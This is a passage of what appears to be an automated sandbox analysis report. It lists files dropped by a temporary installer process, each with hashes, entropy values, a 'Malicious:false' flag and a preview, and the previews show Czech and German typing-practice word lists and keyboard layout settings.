                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):78
                                                          Entropy (8bit):3.899829828948582
                                                          Encrypted:false
                                                          SSDEEP:3:O81Y5qTivtvmfBy7UlWf2vxvwvzv8N+nPyn:ONCilmZiOa2Bw7OKPyn
                                                          MD5:CA1D4315A55A43CE742942BD35034034
                                                          SHA1:5149927E633B4320D00600FDD5A12A367956D49E
                                                          SHA-256:77891560CAC7B7F2ED6AE01E7BFC979EFC1AF6AB686C534F03CFBCAEAB002A3B
                                                          SHA-512:18C88C698B33AC6312BE9ED7EB8D8840605AD33D3AB87650F643E964871EA7171DDD4C69FC121D64548CF5B192BEC5D634A3059DCC876227F7702AF201643823
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Abeceda.A.B.C.D.E.F.G.H.CH.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z...........
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\is-6IOGQ.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):260
                                                          Entropy (8bit):4.444810843100335
                                                          Encrypted:false
                                                          SSDEEP:6:FIGhr9/b0Qy/vnpgWaKkptUWdLWM5FH6sg5HUdvJlkvrpoLSv/c:nX/b0f/vIQMJgCv+2SvE
                                                          MD5:EDBBE4CB460F6E0BD02EEC2116198725
                                                          SHA1:94ED9A1BCDDB42E62B0290093D3ABA073645E5F0
                                                          SHA-256:73E6EC11601E300184A19A15BF2D123E46EE98966B9A49F4AEACE731B941DF13
                                                          SHA-512:1C87B451C2471B5AA99C7829B769B7CCAC358FC85270E134F45CBB0F14CDF4FE7C72DE4A3E1DDDF3838605C69EA4CB9E12EB367CE8BD7372A0D03B8FBABEE9DF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 3 p.smena.ABY.ACH.ALE.ALT.ANO.B.J.B.L.BAR.BAS.BIL.BUK.B.K.CAR.CHA.C.L.DEJ.DUB.D.L.ESO.EVA.F.N.HAD.H.J.H.K.IVA.J.L.KAT.K.V.KAZ.KDE.KDO.KDY.KEL.LED.LEH.L.K.LEM.LEN.LEP.LES.LET.LEV.MED.NIT.NOC.NOS.OSA.R.J.RAK.S.L.SUP.TRH.TRN.TUK.VEN.VES.ZOB
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\is-6M9NV.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):189
                                                          Entropy (8bit):4.354970599038016
                                                          Encrypted:false
                                                          SSDEEP:3:FTExsuIPA5vBUJhJYzn+vuqx8y7MwpK0Dq1vXm10OW28xpKEWMhyQj:FIGvA5gyzQ3ZpKSq1vXC0D2gkEWMv
                                                          MD5:339977CA0C3B1C337D71A31DFA04834F
                                                          SHA1:647A92DC735F8F3E400B859A919A0F1940A6D099
                                                          SHA-256:01C5B4A09727217F99997B5E9E19EE81F26346315426E9781E80D71C2A3ED1C2
                                                          SHA-512:CF2EDD7D15DC92658424D1A4371B87E04A727C53931446488BF5E2CA47B13DB8629F9E65E20EDC38E508F43003D8A18E1EDADA250ADB9D62151D53DB38FE4020
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 2 p.smena.AD.AP.AU.CO.D..DO.DR.EC.ES.HW.J..JE.JI.KE.KS.KU.KV.M..M..MI.MU.NA.NF.NV.OD.OK.ON.OP.OS.PA.PC.P..PO.SE.SI.SK.ST.SW.TA.T..TI.TJ.TO.TU.TY.UK..L.UM.VE.V..VY.WC.ZA.ZE
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\is-C75PA.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):4.567882392336099
                                                          Encrypted:false
                                                          SSDEEP:6:FIGexCy/fnIjb19vCAzTA8Iy47jWfOoOxvwNwEFLB7HxVV3n77:neBm/zE8Iye6fOo8YNpBFL377
                                                          MD5:1E9E1243C3EAE2633D21725160F452F9
                                                          SHA1:CE5FC2CC98D90DF0510A3C928224E3D2DF6062A1
                                                          SHA-256:7EDC11F8A650E4B1BDB28BC352E43D4609C82BBD04A5C1BBD4B10691AE0B114F
                                                          SHA-512:D3DD07851155124656D6EEE8B5FEFC81D6882F6BD3B239AA94FF611B5A28C42DEB7692E5E08D7E149D062982DDDA48E38C9B643FDD137F72153ACC06182A2488
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 4 p.smena.ALFA.AUTO.BRAK.BRAL.COSI.CUKL.CUKR.D.KY.DR.B.EL.N.EMIL.GONG.HLAD.HLAS.HROB.HROM.KLID.KOP..KR.L.KR.M.KR.M.M.SA.M.TO.NUDA.N.TY.O.ZA.OSEL.P.RA.PRAK.ROSA.ROPA.R.HA.RYT..S.TO.SLZA.SN.H.SVAL.T.TA.T.HA.TRN..TYGR.UCHO.UM.T..TOK.V.HA.VATA.VINA.V.TR.VLNA.VRBA.ZIMA.ZNAK.ZVUK.ZVYK
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\is-GHT5L.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):166
                                                          Entropy (8bit):4.755240627854452
                                                          Encrypted:false
                                                          SSDEEP:3:kBpSjxcanNd3uOwgr5UyRvtE58iUKrmN9Gj/DV9xav3L+4yqZvex1Czsvvn:kBpkVnNd3trWOE9UKrmv0rIv3L+9KveB
                                                          MD5:B237FA0E4FDB0C0154545E11AD7BBADE
                                                          SHA1:E35F41A43984FA817F4E239681AA3F1EEA85C64E
                                                          SHA-256:94C63C7BD4828B56A6994C28C70C9BCE6B1A6671354332FEBCCFDDA663367846
                                                          SHA-512:08EBBE90FBDC4B71776A27527831FC22D5ABBADD81AB4859F4BFCDBB09FB4636371C0E5EB933E382BD97D04B1F7E0A422C53ADB2E24C4A6F9F14287D6F7FC202
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Prstov. cvi.en..FTC.TFC.ASFD.SAFD.JKL.KIK.WSX.SXW.DEC.DCE.ECD.UIOP.POIU.HYN.NHY.NYH.GTB.BGT.VCXZ.ZXCV.FVR.RFV.FVR.SWX.WXS.JUJ.RFR..UK.O.O.FT....U.PL...P...
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\is-R0110.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):357
                                                          Entropy (8bit):4.536715192123414
                                                          Encrypted:false
                                                          SSDEEP:6:FIGwAwkocsn7xUgspqOfgkUkYtBw/Z38g5IpNdlgvfS1qril1kvwptRvVRpvx6gP:n1w2G7xUgsVgkUkYzwh82IpNdlgva1qS
                                                          MD5:22177D7D3C82010C035445E0E9C28555
                                                          SHA1:C6C47D95424FD007CA7CA2C6307CA53874BC158F
                                                          SHA-256:4158F01679D9EDEBF87334751870106E227C121655061A63B2F41B2721C1F340
                                                          SHA-512:9E3F04ECD63162EC0DFAA8A2C933E61223FB63882729E72F266536E731D04118428F6B61A26BDC6C52BF8EAFC871AC132E579352AF5717E05AF100696DD7E600
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 5 p.smen.AD.LA.ALICE.AR.NA.BABKA.BAHNO.BAL.K.BIBLE.BL.TO.BOMBA.BAL.K.BAN.K.BATOH.CELER.CHATA.D.RCE.CHL.B.DCERA.D.VKA.FACKA.GEKON.GYMPL.H.DKA.HLAVA.HOLKA.HRNEC.J.TRA.JEN.K.J.DLO.KAB.T.KABEL.KAPKA.KOZ.K.KR.VA.L.VKA.L.HEV.L.SKA.MAMKA.MOTOR.MOT.L.OBJEV.OKOUN.RADEK.S.DLO.SOD.K.TATRA.TUL.K.UBRUS..PICE.VOD.K.V.FUK.Z.PAD.ZLATO
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\is-TL1FL.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):231
                                                          Entropy (8bit):4.47020612224286
                                                          Encrypted:false
                                                          SSDEEP:6:zJ9jqyYngl3Mkf9LNKtjsCA6ukyVqF+M2W1Sg93z:PqMuq9LNJLFkyVqF+MzLl
                                                          MD5:F59629E4FE79FC69680066BC6A48F0AA
                                                          SHA1:D39D19BD3A9359C17D02E8001D11A9DFBDAFA361
                                                          SHA-256:AC129A9634FE2722A065F706992E09D36F12429DE39138DA4CBF8AB1E09C7583
                                                          SHA-512:7BDE36DC4B195950351D4B34CE12414F4C70220CDD3F5B471902C29A0AC15AC59C3E553985BA95EE26E32A26D6DDEBD08707E8625218C6AC220B94F6C03B6315
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Rostliny.AK.T.TULIP.N.LILIE.KOSATEC.DUB.BUK.BOROVICE.JASM.N.LEKN.N.JASAN.BAZALKA.M.TA.J.ROVEC.JITROCEL.L.KOVEC.NARCIS.BLEDULE.P.R.SMRK.JEDLE.MALIN.K.VRBOVKA.OVES.KALINA.BEGONIE.KAKTUS.ZEL..KOPR.KAPUSTA.KOSTIVAL.N.PRSN.K
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\prsty.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):166
                                                          Entropy (8bit):4.755240627854452
                                                          Encrypted:false
                                                          SSDEEP:3:kBpSjxcanNd3uOwgr5UyRvtE58iUKrmN9Gj/DV9xav3L+4yqZvex1Czsvvn:kBpkVnNd3trWOE9UKrmv0rIv3L+9KveB
                                                          MD5:B237FA0E4FDB0C0154545E11AD7BBADE
                                                          SHA1:E35F41A43984FA817F4E239681AA3F1EEA85C64E
                                                          SHA-256:94C63C7BD4828B56A6994C28C70C9BCE6B1A6671354332FEBCCFDDA663367846
                                                          SHA-512:08EBBE90FBDC4B71776A27527831FC22D5ABBADD81AB4859F4BFCDBB09FB4636371C0E5EB933E382BD97D04B1F7E0A422C53ADB2E24C4A6F9F14287D6F7FC202
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Prstov. cvi.en..FTC.TFC.ASFD.SAFD.JKL.KIK.WSX.SXW.DEC.DCE.ECD.UIOP.POIU.HYN.NHY.NYH.GTB.BGT.VCXZ.ZXCV.FVR.RFV.FVR.SWX.WXS.JUJ.RFR..UK.O.O.FT....U.PL...P...
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\rostliny.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):231
                                                          Entropy (8bit):4.47020612224286
                                                          Encrypted:false
                                                          SSDEEP:6:zJ9jqyYngl3Mkf9LNKtjsCA6ukyVqF+M2W1Sg93z:PqMuq9LNJLFkyVqF+MzLl
                                                          MD5:F59629E4FE79FC69680066BC6A48F0AA
                                                          SHA1:D39D19BD3A9359C17D02E8001D11A9DFBDAFA361
                                                          SHA-256:AC129A9634FE2722A065F706992E09D36F12429DE39138DA4CBF8AB1E09C7583
                                                          SHA-512:7BDE36DC4B195950351D4B34CE12414F4C70220CDD3F5B471902C29A0AC15AC59C3E553985BA95EE26E32A26D6DDEBD08707E8625218C6AC220B94F6C03B6315
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Rostliny.AK.T.TULIP.N.LILIE.KOSATEC.DUB.BUK.BOROVICE.JASM.N.LEKN.N.JASAN.BAZALKA.M.TA.J.ROVEC.JITROCEL.L.KOVEC.NARCIS.BLEDULE.P.R.SMRK.JEDLE.MALIN.K.VRBOVKA.OVES.KALINA.BEGONIE.KAKTUS.ZEL..KOPR.KAPUSTA.KOSTIVAL.N.PRSN.K
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\slova2.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):189
                                                          Entropy (8bit):4.354970599038016
                                                          Encrypted:false
                                                          SSDEEP:3:FTExsuIPA5vBUJhJYzn+vuqx8y7MwpK0Dq1vXm10OW28xpKEWMhyQj:FIGvA5gyzQ3ZpKSq1vXC0D2gkEWMv
                                                          MD5:339977CA0C3B1C337D71A31DFA04834F
                                                          SHA1:647A92DC735F8F3E400B859A919A0F1940A6D099
                                                          SHA-256:01C5B4A09727217F99997B5E9E19EE81F26346315426E9781E80D71C2A3ED1C2
                                                          SHA-512:CF2EDD7D15DC92658424D1A4371B87E04A727C53931446488BF5E2CA47B13DB8629F9E65E20EDC38E508F43003D8A18E1EDADA250ADB9D62151D53DB38FE4020
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 2 p.smena.AD.AP.AU.CO.D..DO.DR.EC.ES.HW.J..JE.JI.KE.KS.KU.KV.M..M..MI.MU.NA.NF.NV.OD.OK.ON.OP.OS.PA.PC.P..PO.SE.SI.SK.ST.SW.TA.T..TI.TJ.TO.TU.TY.UK..L.UM.VE.V..VY.WC.ZA.ZE
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\slova3.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):260
                                                          Entropy (8bit):4.444810843100335
                                                          Encrypted:false
                                                          SSDEEP:6:FIGhr9/b0Qy/vnpgWaKkptUWdLWM5FH6sg5HUdvJlkvrpoLSv/c:nX/b0f/vIQMJgCv+2SvE
                                                          MD5:EDBBE4CB460F6E0BD02EEC2116198725
                                                          SHA1:94ED9A1BCDDB42E62B0290093D3ABA073645E5F0
                                                          SHA-256:73E6EC11601E300184A19A15BF2D123E46EE98966B9A49F4AEACE731B941DF13
                                                          SHA-512:1C87B451C2471B5AA99C7829B769B7CCAC358FC85270E134F45CBB0F14CDF4FE7C72DE4A3E1DDDF3838605C69EA4CB9E12EB367CE8BD7372A0D03B8FBABEE9DF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 3 p.smena.ABY.ACH.ALE.ALT.ANO.B.J.B.L.BAR.BAS.BIL.BUK.B.K.CAR.CHA.C.L.DEJ.DUB.D.L.ESO.EVA.F.N.HAD.H.J.H.K.IVA.J.L.KAT.K.V.KAZ.KDE.KDO.KDY.KEL.LED.LEH.L.K.LEM.LEN.LEP.LES.LET.LEV.MED.NIT.NOC.NOS.OSA.R.J.RAK.S.L.SUP.TRH.TRN.TUK.VEN.VES.ZOB
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\slova4.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):4.567882392336099
                                                          Encrypted:false
                                                          SSDEEP:6:FIGexCy/fnIjb19vCAzTA8Iy47jWfOoOxvwNwEFLB7HxVV3n77:neBm/zE8Iye6fOo8YNpBFL377
                                                          MD5:1E9E1243C3EAE2633D21725160F452F9
                                                          SHA1:CE5FC2CC98D90DF0510A3C928224E3D2DF6062A1
                                                          SHA-256:7EDC11F8A650E4B1BDB28BC352E43D4609C82BBD04A5C1BBD4B10691AE0B114F
                                                          SHA-512:D3DD07851155124656D6EEE8B5FEFC81D6882F6BD3B239AA94FF611B5A28C42DEB7692E5E08D7E149D062982DDDA48E38C9B643FDD137F72153ACC06182A2488
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 4 p.smena.ALFA.AUTO.BRAK.BRAL.COSI.CUKL.CUKR.D.KY.DR.B.EL.N.EMIL.GONG.HLAD.HLAS.HROB.HROM.KLID.KOP..KR.L.KR.M.KR.M.M.SA.M.TO.NUDA.N.TY.O.ZA.OSEL.P.RA.PRAK.ROSA.ROPA.R.HA.RYT..S.TO.SLZA.SN.H.SVAL.T.TA.T.HA.TRN..TYGR.UCHO.UM.T..TOK.V.HA.VATA.VINA.V.TR.VLNA.VRBA.ZIMA.ZNAK.ZVUK.ZVYK
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\slova5.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):357
                                                          Entropy (8bit):4.536715192123414
                                                          Encrypted:false
                                                          SSDEEP:6:FIGwAwkocsn7xUgspqOfgkUkYtBw/Z38g5IpNdlgvfS1qril1kvwptRvVRpvx6gP:n1w2G7xUgsVgkUkYzwh82IpNdlgva1qS
                                                          MD5:22177D7D3C82010C035445E0E9C28555
                                                          SHA1:C6C47D95424FD007CA7CA2C6307CA53874BC158F
                                                          SHA-256:4158F01679D9EDEBF87334751870106E227C121655061A63B2F41B2721C1F340
                                                          SHA-512:9E3F04ECD63162EC0DFAA8A2C933E61223FB63882729E72F266536E731D04118428F6B61A26BDC6C52BF8EAFC871AC132E579352AF5717E05AF100696DD7E600
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 5 p.smen.AD.LA.ALICE.AR.NA.BABKA.BAHNO.BAL.K.BIBLE.BL.TO.BOMBA.BAL.K.BAN.K.BATOH.CELER.CHATA.D.RCE.CHL.B.DCERA.D.VKA.FACKA.GEKON.GYMPL.H.DKA.HLAVA.HOLKA.HRNEC.J.TRA.JEN.K.J.DLO.KAB.T.KABEL.KAPKA.KOZ.K.KR.VA.L.VKA.L.HEV.L.SKA.MAMKA.MOTOR.MOT.L.OBJEV.OKOUN.RADEK.S.DLO.SOD.K.TATRA.TUL.K.UBRUS..PICE.VOD.K.V.FUK.Z.PAD.ZLATO
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\is-BVDPO.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):347
                                                          Entropy (8bit):4.5058472076654565
                                                          Encrypted:false
                                                          SSDEEP:6:SuFJAxMGf+wnvVEk6ubLCG3jOQU4n+4rc/m8YzaY1oxv:PFawqvVR+aOenKu8UOv
                                                          MD5:73E29CD1BBF3A6420A590F85A288F5DD
                                                          SHA1:F21FE09F412F784231A5759FE09DA29857DEC9CE
                                                          SHA-256:9198FD4883326B94F1A0C7A6CCDF0314F78DEC4A2AC7F415E6E11C58D5D8A1C1
                                                          SHA-512:3E6049D302826EFC67A909A6C36E972020C0993BC1A69851E61D82CBBB1C10712FC11CEC6DD8428D76063F863C2F5DE2CE9AD83DBF675FD70F8215DF4D57F0F2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: # keyboard.lst for German theme.0|A.0|a.3|B.3|b.3|C.3|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.0|Y.0|y.6|Z.6|z.5| .0|!.0|@.9|#.0|1.0|2.0|3.0|4.0|5.0|6.0|7.0|8.0|9.0|0.7|,.8|..7|;.8|:.9|..9|..9|..9|..9|..9|..9|..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\is-V6CGM.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):30
                                                          Entropy (8bit):4.161406329721842
                                                          Encrypted:false
                                                          SSDEEP:3:U96EFjpfhOKIt:UYEFyt
                                                          MD5:776994AB6EA8743809D4BA88F52F179B
                                                          SHA1:3BC5391AB61A9B351BE40BF00B3F0E1C00FB7550
                                                          SHA-256:E3F5998ED37D340074E22A6ECFCFE7F0DED18E42E93FED4768F91A767F792BBE
                                                          SHA-512:F08C3AA95D4B0D13A9CCC54E0ADC837F9F2FF48E3803713DABB41723D0FAABA601B8AF320FAA18F8092040DF70599F279EC169A5C2C43B31654C13C69689CF5F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_locale_name=de_DE.UTF-8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\keyboard.lst (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):347
                                                          Entropy (8bit):4.5058472076654565
                                                          Encrypted:false
                                                          SSDEEP:6:SuFJAxMGf+wnvVEk6ubLCG3jOQU4n+4rc/m8YzaY1oxv:PFawqvVR+aOenKu8UOv
                                                          MD5:73E29CD1BBF3A6420A590F85A288F5DD
                                                          SHA1:F21FE09F412F784231A5759FE09DA29857DEC9CE
                                                          SHA-256:9198FD4883326B94F1A0C7A6CCDF0314F78DEC4A2AC7F415E6E11C58D5D8A1C1
                                                          SHA-512:3E6049D302826EFC67A909A6C36E972020C0993BC1A69851E61D82CBBB1C10712FC11CEC6DD8428D76063F863C2F5DE2CE9AD83DBF675FD70F8215DF4D57F0F2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: # keyboard.lst for German theme.0|A.0|a.3|B.3|b.3|C.3|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.0|Y.0|y.6|Z.6|z.5| .0|!.0|@.9|#.0|1.0|2.0|3.0|4.0|5.0|6.0|7.0|8.0|9.0|0.7|,.8|..7|;.8|:.9|..9|..9|..9|..9|..9|..9|..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\settings.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):30
                                                          Entropy (8bit):4.161406329721842
                                                          Encrypted:false
                                                          SSDEEP:3:U96EFjpfhOKIt:UYEFyt
                                                          MD5:776994AB6EA8743809D4BA88F52F179B
                                                          SHA1:3BC5391AB61A9B351BE40BF00B3F0E1C00FB7550
                                                          SHA-256:E3F5998ED37D340074E22A6ECFCFE7F0DED18E42E93FED4768F91A767F792BBE
                                                          SHA-512:F08C3AA95D4B0D13A9CCC54E0ADC837F9F2FF48E3803713DABB41723D0FAABA601B8AF320FAA18F8092040DF70599F279EC169A5C2C43B31654C13C69689CF5F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_locale_name=de_DE.UTF-8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\is-13KCB.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):454
                                                          Entropy (8bit):5.122530076508582
                                                          Encrypted:false
                                                          SSDEEP:12:hoxOKNStZIyehKQAQ0bMcmmUYZCLKaVWECplBT26xpFmY6Mbb:hopNCVeYVQ0bRmgsLKaPCn7DmY6Mbb
                                                          MD5:DDC9476957886517205D29154B3D7404
                                                          SHA1:7E9A6E86AD4556DCF050F82A10097F61DBD73968
                                                          SHA-256:6C0AFE6326B00996FE6FA6FF7EC5DEF39FC2F77965FB6D0C4F910EF433584891
                                                          SHA-512:70AD87EB0D34ECD2DE0DFA22029E1F7D7CDF3A94E08D3B3CD68875D2020675DAE7238AE468AC0F3AAC2B33E1202A7EE9E8902C959E7E3AA88C7F8E32BA737B36
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mittellange W.rter (mit ....).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.F.NF.GRO..GR.N.K.SE.K.LN.K.HL.L.RM.L.WE.M.RZ.M.WE.M.LL..BEN..BER.WEI..DAF.R.F.HRE.GL.CK.H.FTE.H.GEL.K.STE.L.NGE.M.BEL.M.GEN.M.HRE.SCH.N.ST.CK.S.DEN.Z.GEL.ZW.LF.BR.CKE.F.NZIG.HEI.EN.K.RPER.L.FFEL.SP.LEN.S.DPOL.W.SCHE.ZUR.CK.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\is-4U8BK.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):262
                                                          Entropy (8bit):4.977809871929063
                                                          Encrypted:false
                                                          SSDEEP:6:/f+KNStZIyeh6FM/AgvRTSxtvT4cmLCirYZq2Npv5QBf2lWd:/GKNStZIyehKQAQ0bMcmmUYZLjRlU
                                                          MD5:D932B1FFC8B5321EE9C7A9EF7CBB8BFA
                                                          SHA1:5E6ACE040D0A3291687DC129A2AB02DB4DC5C1FC
                                                          SHA-256:041068A572C5265693A0369E79E2080055F5EDDCE35A80024985ED45D150A2C4
                                                          SHA-512:C9D4250A1ACA4CD7C342ACBD17BD5B6EAA957364C2F535DC87D27E1B85A8E9493B5C8F743F8FFF14A509C5A78E4130C185720662ABD9086F8B56B214111E7D1E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Kurze W.rter (mit ....).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt..L.B.R.F.N.F.R.FU..J.H.K.R.MA..MU...HR..SE.RU..S...T.R.Z.H.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\is-CF6RI.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):748
                                                          Entropy (8bit):4.937127782916994
                                                          Encrypted:false
                                                          SSDEEP:12:/GKNZIyehKQAQ0bMcmmUYZAafAmk7df5oUj7/KV5FdjBYfZ10t5AHpBkR9Cxiuoq:/XNVeYVQ0bRmgnImw5oUj7/KVFjSL03Y
                                                          MD5:3C435E36363E652943C29CD86F2C8818
                                                          SHA1:CF6B7A8A8731730D21407AFFE40D06B94415D28B
                                                          SHA-256:D55885604A0BC9B1E7767ADA1982A4C788A03160165326CAAAE29207DDD47847
                                                          SHA-512:6F888B08E2AC750911AAA62D928A2E06FB94D421F3D617CF46FF5B1DA0662019AACCFC39C0860E9A6C3DB1BECB71358799FBA2A017DFD22FF51BAF78B0F04858
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Kurze W.rter (gemischt).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.AB.AM.AN.AS.DA.DU.EI.ER.ES.IM.IN.JA.OB..L.PO.SO.UM.WO.ZU.AAL.AKT.ALS.AMT.ARM.ART.AUF.BAD.B.R.BAU.BEI.BIN.BIS.BUG.BUS.DAS.DER.DIA.DIE.EID.EIN.EIS.ELF.ENG.FEE.FIX.F.N.F.R.FU..GAR.GAS.GUT.HAI.HEU.HOF.HUF.HUT.IHM.IHN.IHR.IST.J.H.JUX.KAP.KUH.KUR.K.R.LAS.LAX.LID.LOB.LOK.LOS.MAG.MAI.MAL.MAN.MA..MET.MIT.MU..NAH.NEU.NIE.NOT.NUN.NUR.OFT.OHR..HR.OMA.OPA.ORT..SE.PER.PIK.POL.PRO.RAD.RAR.RAT.REH.ROH.ROM.ROT.RUF.RU..SAU.SEE.SIE.SKI.S...TAG.TAL.TAT.TEE.TOD.TON.TOR.TOT.T.R.TUX.TYP.UHR.UHU.ULK.UND.VON.VOR.WAL.WAS.WEG.WEH.WEM.WEN.WER.WIE.WIR.WUT.Z.H.ZEH.ZOO.ZUG.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\is-D8OE3.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):3354
                                                          Entropy (8bit):4.531608584537004
